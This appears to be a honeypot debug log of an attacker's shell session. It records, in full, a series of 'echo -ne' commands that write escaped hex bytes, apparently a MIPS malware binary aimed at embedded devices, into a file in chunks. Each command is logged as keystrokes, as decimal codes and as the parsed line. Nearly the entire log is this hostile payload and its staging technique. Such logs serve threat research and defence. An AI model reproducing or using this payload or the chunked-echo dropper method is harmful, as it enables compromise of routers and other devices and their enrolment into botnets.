2022-10-22 23:05:08.617 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,56,102,92,120,98,102,92,120,48,48,92,120,50,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,50,55,92,120,98,100,92,120,48,48,92,120,51,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,52,92,120,49,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,50,55,92,120,98,100,92,120,102,102,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.617 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x38\xaf\xbf\x00\xc0\xaf\xb3\x00\xbc\xaf\xb2\x00\xb8\xaf\xb1\x00\xb4\xaf\xb0\x00\xb0\xaf\xbc\x00\x10\x8f\x82\x80\x18\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.619 - [Debug] [SHELL] line from reader: echo -ne "\x38\xaf\xbf\x00\xc0\xaf\xb3\x00\xbc\xaf\xb2\x00\xb8\xaf\xb1\x00\xb4\xaf\xb0\x00\xb0\xaf\xbc\x00\x10\x8f\x82\x80\x18\x00\x00\x00" >> gay
2022-10-22 23:05:08.621 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,51,56,92,120,97,102,92,120,98,102,92,120,48,48,92,120,99,48,92,120,97,102,92,120,98,51,92,120,48,48,92,120,98,99,92,120,97,102,92,120,98,50,92,120,48,48,92,120,98,56,92,120,97,102,92,120,98,49,92,120,48,48,92,120,98,52,92,120,97,102,92,120,98,48,92,120,48,48,92,120,98,48,92,120,97,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,56,50,92,120,56,48,92,120,49,56,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.622 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x24\x50\x05\xe0\x82\x02\x00\x00\x00\x00\x00\x00\x14\x40\xff\xfd\x26\x10\x00\x01\x26\x10\xff\xff\x8f\x85\x80\x18\x8f\x82\x80"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.625 - [Debug] [SHELL] line from reader: echo -ne "\x00\x24\x50\x05\xe0\x82\x02\x00\x00\x00\x00\x00\x00\x14\x40\xff\xfd\x26\x10\x00\x01\x26\x10\xff\xff\x8f\x85\x80\x18\x8f\x82\x80" >> gay
2022-10-22 23:05:08.626 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,50,52,92,120,53,48,92,120,48,53,92,120,101,48,92,120,56,50,92,120,48,50,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,52,92,120,52,48,92,120,102,102,92,120,102,100,92,120,50,54,92,120,49,48,92,120,48,48,92,120,48,49,92,120,50,54,92,120,49,48,92,120,102,102,92,120,102,102,92,120,56,102,92,120,56,53,92,120,56,48,92,120,49,56,92,120,56,102,92,120,56,50,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.628 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x18\x8f\x99\x80\x48\x24\xa5\x05\xe8\x24\x04\x00\x01\x24\x06\x00\x06\x24\x42\x05\xe0\x03\x20\xf8\x09\x02\x02\x98\x23\x8f\xbc\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.632 - [Debug] [SHELL] line from reader: echo -ne "\x18\x8f\x99\x80\x48\x24\xa5\x05\xe8\x24\x04\x00\x01\x24\x06\x00\x06\x24\x42\x05\xe0\x03\x20\xf8\x09\x02\x02\x98\x23\x8f\xbc\x00" >> gay
2022-10-22 23:05:08.635 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,56,92,120,50,52,92,120,97,53,92,120,48,53,92,120,101,56,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,49,92,120,50,52,92,120,48,54,92,120,48,48,92,120,48,54,92,120,50,52,92,120,52,50,92,120,48,53,92,120,101,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,50,92,120,48,50,92,120,57,56,92,120,50,51,92,120,56,102,92,120,98,99,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.635 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x10\x24\x02\x00\x02\x8f\x99\x80\x4c\xa7\xa2\x00\x1c\x24\x02\x00\x50\x24\x07\x00\x2f\x24\x04\x00\x2e\x24\x05\x00\x17\x24\x06\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.637 - [Debug] [SHELL] line from reader: echo -ne "\x10\x24\x02\x00\x02\x8f\x99\x80\x4c\xa7\xa2\x00\x1c\x24\x02\x00\x50\x24\x07\x00\x2f\x24\x04\x00\x2e\x24\x05\x00\x17\x24\x06\x00" >> gay
2022-10-22 23:05:08.639 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,49,48,92,120,50,52,92,120,48,50,92,120,48,48,92,120,48,50,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,99,92,120,97,55,92,120,97,50,92,120,48,48,92,120,49,99,92,120,50,52,92,120,48,50,92,120,48,48,92,120,53,48,92,120,50,52,92,120,48,55,92,120,48,48,92,120,50,102,92,120,50,52,92,120,48,52,92,120,48,48,92,120,50,101,92,120,50,52,92,120,48,53,92,120,48,48,92,120,49,55,92,120,50,52,92,120,48,54,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.639 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x6d\x03\x20\xf8\x09\xa7\xa2\x00\x1e\x8f\xbc\x00\x10\x24\x05\x03\x01\x8f\x84\x80\x18\x8f\x99\x80\x60\x24\x84\x05\xf0\x24\x06\x01"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.642 - [Debug] [SHELL] line from reader: echo -ne "\x6d\x03\x20\xf8\x09\xa7\xa2\x00\x1e\x8f\xbc\x00\x10\x24\x05\x03\x01\x8f\x84\x80\x18\x8f\x99\x80\x60\x24\x84\x05\xf0\x24\x06\x01" >> gay
2022-10-22 23:05:08.645 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,54,100,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,97,55,92,120,97,50,92,120,48,48,92,120,49,101,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,50,52,92,120,48,53,92,120,48,51,92,120,48,49,92,120,56,102,92,120,56,52,92,120,56,48,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,92,120,54,48,92,120,50,52,92,120,56,52,92,120,48,53,92,120,102,48,92,120,50,52,92,120,48,54,92,120,48,49,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.645 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xff\x03\x20\xf8\x09\xaf\xa2\x00\x20\x8f\xbc\x00\x10\x24\x04\x00\x02\x8f\x99\x80\x50\x24\x05\x00\x02\x00\x00\x30\x21\x03\x20\xf8"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.649 - [Debug] [SHELL] line from reader: echo -ne "\xff\x03\x20\xf8\x09\xaf\xa2\x00\x20\x8f\xbc\x00\x10\x24\x04\x00\x02\x8f\x99\x80\x50\x24\x05\x00\x02\x00\x00\x30\x21\x03\x20\xf8" >> gay
2022-10-22 23:05:08.650 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,102,102,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,97,102,92,120,97,50,92,120,48,48,92,120,50,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,50,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,48,92,120,50,52,92,120,48,53,92,120,48,48,92,120,48,50,92,120,48,48,92,120,48,48,92,120,51,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,102,56,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.651 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x09\x00\x40\x90\x21\x00\x40\x88\x21\x24\x02\xff\xff\x8f\xbc\x00\x10\x12\x22\x00\x03\x00\x00\x00\x00\x16\x42\x00\x07\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.654 - [Debug] [SHELL] line from reader: echo -ne "\x09\x00\x40\x90\x21\x00\x40\x88\x21\x24\x02\xff\xff\x8f\xbc\x00\x10\x12\x22\x00\x03\x00\x00\x00\x00\x16\x42\x00\x07\x00\x00\x00" >> gay
2022-10-22 23:05:08.655 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,57,92,120,48,48,92,120,52,48,92,120,57,48,92,120,50,49,92,120,48,48,92,120,52,48,92,120,56,56,92,120,50,49,92,120,50,52,92,120,48,50,92,120,102,102,92,120,102,102,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,49,50,92,120,50,50,92,120,48,48,92,120,48,51,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,49,54,92,120,52,50,92,120,48,48,92,120,48,55,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.655 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00\x01\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x44\x02\x20\x20"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.657 - [Debug] [SHELL] line from reader: echo -ne "\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00\x01\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x44\x02\x20\x20" >> gay
2022-10-22 23:05:08.659 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,52,92,120,48,50,92,120,50,48,92,120,50,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.659 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x21\x27\xa5\x00\x1c\x03\x20\xf8\x09\x24\x06\x00\x10\x8f\xbc\x00\x10\x04\x41\x00\x0f\x00\x40\x80\x21\x8f\x85\x80\x18\x8f\x99\x80"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.662 - [Debug] [SHELL] line from reader: echo -ne "\x21\x27\xa5\x00\x1c\x03\x20\xf8\x09\x24\x06\x00\x10\x8f\xbc\x00\x10\x04\x41\x00\x0f\x00\x40\x80\x21\x8f\x85\x80\x18\x8f\x99\x80" >> gay
2022-10-22 23:05:08.664 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,49,92,120,50,55,92,120,97,53,92,120,48,48,92,120,49,99,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,49,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,52,92,120,52,49,92,120,48,48,92,120,48,102,92,120,48,48,92,120,52,48,92,120,56,48,92,120,50,49,92,120,56,102,92,120,56,53,92,120,56,48,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.664 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x48\x24\xa5\x05\xfc\x24\x04\x00\x01\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.668 - [Debug] [SHELL] line from reader: echo -ne "\x48\x24\xa5\x05\xfc\x24\x04\x00\x01\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00" >> gay
2022-10-22 23:05:08.669 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,52,56,92,120,50,52,92,120,97,53,92,120,48,53,92,120,102,99,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,49,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,48,52,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.669 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x03\x20\xf8\x09\x00\x10\x20\x23\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x85\x80\x18\x8f\x99\x80\x48\x26\x70\x00\x1e\x24\xa5\x06"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.672 - [Debug] [SHELL] line from reader: echo -ne "\x00\x03\x20\xf8\x09\x00\x10\x20\x23\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x85\x80\x18\x8f\x99\x80\x48\x26\x70\x00\x1e\x24\xa5\x06" >> gay
2022-10-22 23:05:08.675 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,48,92,120,49,48,92,120,50,48,92,120,50,51,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,56,53,92,120,56,48,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,56,92,120,50,54,92,120,55,48,92,120,48,48,92,120,49,101,92,120,50,52,92,120,97,53,92,120,48,54,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.676 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x04\x02\x20\x20\x21\x03\x20\xf8\x09\x02\x00\x30\x21\x8f\xbc\x00\x10\x10\x50\x00\x07\x00\x00\x80\x21\x8f\x99\x80\x54\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.678 - [Debug] [SHELL] line from reader: echo -ne "\x04\x02\x20\x20\x21\x03\x20\xf8\x09\x02\x00\x30\x21\x8f\xbc\x00\x10\x10\x50\x00\x07\x00\x00\x80\x21\x8f\x99\x80\x54\x00\x00\x00" >> gay
2022-10-22 23:05:08.680 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,52,92,120,48,50,92,120,50,48,92,120,50,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,50,92,120,48,48,92,120,51,48,92,120,50,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,49,48,92,120,53,48,92,120,48,48,92,120,48,55,92,120,48,48,92,120,48,48,92,120,56,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.680 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x03\x20\xf8\x09\x24\x04\x00\x03\x8f\xbc\x00\x10\x00\x00\x80\x21\x8f\x99\x80\x38\x02\x20\x20\x21\x27\xa5\x00\x18\x03\x20\xf8"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.684 - [Debug] [SHELL] line from reader: echo -ne "\x00\x03\x20\xf8\x09\x24\x04\x00\x03\x8f\xbc\x00\x10\x00\x00\x80\x21\x8f\x99\x80\x38\x02\x20\x20\x21\x27\xa5\x00\x18\x03\x20\xf8" >> gay
2022-10-22 23:05:08.686 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,51,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,56,48,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,51,56,92,120,48,50,92,120,50,48,92,120,50,48,92,120,50,49,92,120,50,55,92,120,97,53,92,120,48,48,92,120,49,56,92,120,48,51,92,120,50,48,92,120,102,56,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.686 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x09\x24\x06\x00\x01\x8f\xbc\x00\x10\x24\x03\x00\x01\x8f\x99\x80\x54\x10\x43\x00\x04\x24\x04\x00\x04\x03\x20\xf8\x09\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.689 - [Debug] [SHELL] line from reader: echo -ne "\x09\x24\x06\x00\x01\x8f\xbc\x00\x10\x24\x03\x00\x01\x8f\x99\x80\x54\x10\x43\x00\x04\x24\x04\x00\x04\x03\x20\xf8\x09\x00\x00\x00" >> gay
2022-10-22 23:05:08.692 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,48,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,50,52,92,120,48,51,92,120,48,48,92,120,48,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,49,48,92,120,52,51,92,120,48,48,92,120,48,52,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,52,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.692 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x8f\xbc\x00\x10\x83\xa3\x00\x18\x00\x10\x12\x00\x00\x43\x80\x25\x3c\x02\x0d\x0a\x34\x42\x0d\x0a\x16\x02\xff\xed\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.696 - [Debug] [SHELL] line from reader: echo -ne "\x00\x8f\xbc\x00\x10\x83\xa3\x00\x18\x00\x10\x12\x00\x00\x43\x80\x25\x3c\x02\x0d\x0a\x34\x42\x0d\x0a\x16\x02\xff\xed\x00\x00\x00" >> gay
2022-10-22 23:05:08.701 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,51,92,120,97,51,92,120,48,48,92,120,49,56,92,120,48,48,92,120,49,48,92,120,49,50,92,120,48,48,92,120,48,48,92,120,52,51,92,120,56,48,92,120,50,53,92,120,51,99,92,120,48,50,92,120,48,100,92,120,48,97,92,120,51,52,92,120,52,50,92,120,48,100,92,120,48,97,92,120,49,54,92,120,48,50,92,120,102,102,92,120,101,100,92,120,48,48,92,120,48,48,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.701 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x00\x8f\x99\x80\x38\x27\xb0\x00\x2c\x02\x20\x20\x21\x02\x00\x28\x21\x03\x20\xf8\x09\x24\x06\x00\x80\x8f\xbc\x00\x10\x02\x00\x28"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.707 - [Debug] [SHELL] line from reader: echo -ne "\x00\x8f\x99\x80\x38\x27\xb0\x00\x2c\x02\x20\x20\x21\x02\x00\x28\x21\x03\x20\xf8\x09\x24\x06\x00\x80\x8f\xbc\x00\x10\x02\x00\x28" >> gay
2022-10-22 23:05:08.708 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,51,56,92,120,50,55,92,120,98,48,92,120,48,48,92,120,50,99,92,120,48,50,92,120,50,48,92,120,50,48,92,120,50,49,92,120,48,50,92,120,48,48,92,120,50,56,92,120,50,49,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,56,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,50,92,120,48,48,92,120,50,56,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.709 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x21\x8f\x99\x80\x48\x00\x40\x30\x21\x18\x40\x00\x06\x02\x40\x20\x21\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x10\x10\x00\xff"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.711 - [Debug] [SHELL] line from reader: echo -ne "\x21\x8f\x99\x80\x48\x00\x40\x30\x21\x18\x40\x00\x06\x02\x40\x20\x21\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x10\x10\x00\xff" >> gay
2022-10-22 23:05:08.714 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,49,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,56,92,120,48,48,92,120,52,48,92,120,51,48,92,120,50,49,92,120,49,56,92,120,52,48,92,120,48,48,92,120,48,54,92,120,48,50,92,120,52,48,92,120,50,48,92,120,50,49,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,49,48,92,120,48,48,92,120,102,102,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.714 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xf0\x00\x00\x00\x00\x8f\x99\x80\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x20\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.719 - [Debug] [SHELL] line from reader: echo -ne "\xf0\x00\x00\x00\x00\x8f\x99\x80\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x20\x20\x21\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80" >> gay
2022-10-22 23:05:08.719 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,102,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,50,92,120,50,48,92,120,50,48,92,120,50,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.719 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x40\x20\x21\x8f\xbc\x00\x10\x24\x04\x00\x01\x8f\x85\x80\x18\x8f\x99\x80\x48\x24\xa5\x06"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.724 - [Debug] [SHELL] line from reader: echo -ne "\x58\x00\x00\x00\x00\x03\x20\xf8\x09\x02\x40\x20\x21\x8f\xbc\x00\x10\x24\x04\x00\x01\x8f\x85\x80\x18\x8f\x99\x80\x48\x24\xa5\x06" >> gay
2022-10-22 23:05:08.724 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,53,56,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,48,50,92,120,52,48,92,120,50,48,92,120,50,49,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,50,52,92,120,48,52,92,120,48,48,92,120,48,49,92,120,56,102,92,120,56,53,92,120,56,48,92,120,49,56,92,120,56,102,92,120,57,57,92,120,56,48,92,120,52,56,92,120,50,52,92,120,97,53,92,120,48,54,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.725 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x24\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.727 - [Debug] [SHELL] line from reader: echo -ne "\x24\x03\x20\xf8\x09\x24\x06\x00\x04\x8f\xbc\x00\x10\x00\x00\x00\x00\x8f\x99\x80\x54\x00\x00\x00\x00\x03\x20\xf8\x09\x24\x04\x00" >> gay
2022-10-22 23:05:08.727 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,50,52,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,54,92,120,48,48,92,120,48,52,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,56,102,92,120,57,57,92,120,56,48,92,120,53,52,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,51,92,120,50,48,92,120,102,56,92,120,48,57,92,120,50,52,92,120,48,52,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.728 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x05\x8f\xbc\x00\x10\x8f\xbf\x00\xc0\x8f\xb3\x00\xbc\x8f\xb2\x00\xb8\x8f\xb1\x00\xb4\x8f\xb0\x00\xb0\x03\xe0\x00\x08\x27\xbd\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.730 - [Debug] [SHELL] line from reader: echo -ne "\x05\x8f\xbc\x00\x10\x8f\xbf\x00\xc0\x8f\xb3\x00\xbc\x8f\xb2\x00\xb8\x8f\xb1\x00\xb4\x8f\xb0\x00\xb0\x03\xe0\x00\x08\x27\xbd\x00" >> gay
2022-10-22 23:05:08.730 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,48,53,92,120,56,102,92,120,98,99,92,120,48,48,92,120,49,48,92,120,56,102,92,120,98,102,92,120,48,48,92,120,99,48,92,120,56,102,92,120,98,51,92,120,48,48,92,120,98,99,92,120,56,102,92,120,98,50,92,120,48,48,92,120,98,56,92,120,56,102,92,120,98,49,92,120,48,48,92,120,98,52,92,120,56,102,92,120,98,48,92,120,48,48,92,120,98,48,92,120,48,51,92,120,101,48,92,120,48,48,92,120,48,56,92,120,50,55,92,120,98,100,92,120,48,48,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.730 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\xc8\x3c\x1c\x00\x05\x27\x9c\x81\x60\x03\x99\xe0\x21\x03\xe0\x00\x21\x04\x11\x00\x01\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x81"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.734 - [Debug] [SHELL] line from reader: echo -ne "\xc8\x3c\x1c\x00\x05\x27\x9c\x81\x60\x03\x99\xe0\x21\x03\xe0\x00\x21\x04\x11\x00\x01\x00\x00\x00\x00\x3c\x1c\x00\x05\x27\x9c\x81" >> gay
2022-10-22 23:05:08.734 - [Debug] [SHELL] Keystroke buffer: 101,99,104,111,32,45,110,101,32,34,92,120,99,56,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,49,92,120,54,48,92,120,48,51,92,120,57,57,92,120,101,48,92,120,50,49,92,120,48,51,92,120,101,48,92,120,48,48,92,120,50,49,92,120,48,52,92,120,49,49,92,120,48,48,92,120,48,49,92,120,48,48,92,120,48,48,92,120,48,48,92,120,48,48,92,120,51,99,92,120,49,99,92,120,48,48,92,120,48,53,92,120,50,55,92,120,57,99,92,120,56,49,34,32,62,62,32,103,97,121,10
2022-10-22 23:05:08.734 - [Debug] [SHELL] Attacker Keystroke: echo[Space]-ne[Space]"\x48\x03\x9f\xe0\x21\x00\x00\xf8\x21\x8f\x99\x80\x3c\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"[Space]>>[Space]gay[LF]
2022-10-22 23:05:08.737 - [Debug] [SHELL] line from reader: echo -ne "\x48\x03\x9f\xe0\x21\x00\x00\xf8\x21\x8f\x99\x80\x3c\x00\x00\x00\x00\x03\x20\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >> gay
